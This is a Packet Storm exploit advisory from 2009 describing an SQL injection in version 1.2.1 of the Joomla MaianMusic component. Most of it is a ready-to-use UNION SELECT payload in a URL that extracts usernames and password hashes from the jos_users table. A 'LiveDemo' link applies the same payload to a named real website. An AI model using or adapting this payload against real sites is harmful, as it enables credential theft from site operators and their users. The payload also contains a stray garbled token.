Joomla Maian Music 1.2.1 SQL Injection

2009-04-08T00:00:00
ID PACKETSTORM:76450
Type packetstorm
Reporter Valon Kerolli
Modified 2009-04-08T00:00:00

Description

                                        
                                            `#############################################################################  
# #  
# Joomla Component MaianMusic SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] Component: "MaianMusic (com_maianmusic)"  
[~] Version: "1.2.1"   
[~] Date: "09-26-2008"  
[~] Author: "Arelowo Alao & David Bennett"  
[~] Author E-mail: "Alao@aretimes.com"  
[~] Author URL: "www.aretimes.com"  
  
########################################  
  
[~] Exploit: /index.php?option=com_maianmusic&section=category&category=[SQL]&Itemid=70  
[~] Example: /index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70  
  
########################################  
  
[~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en  
  
########################################  
`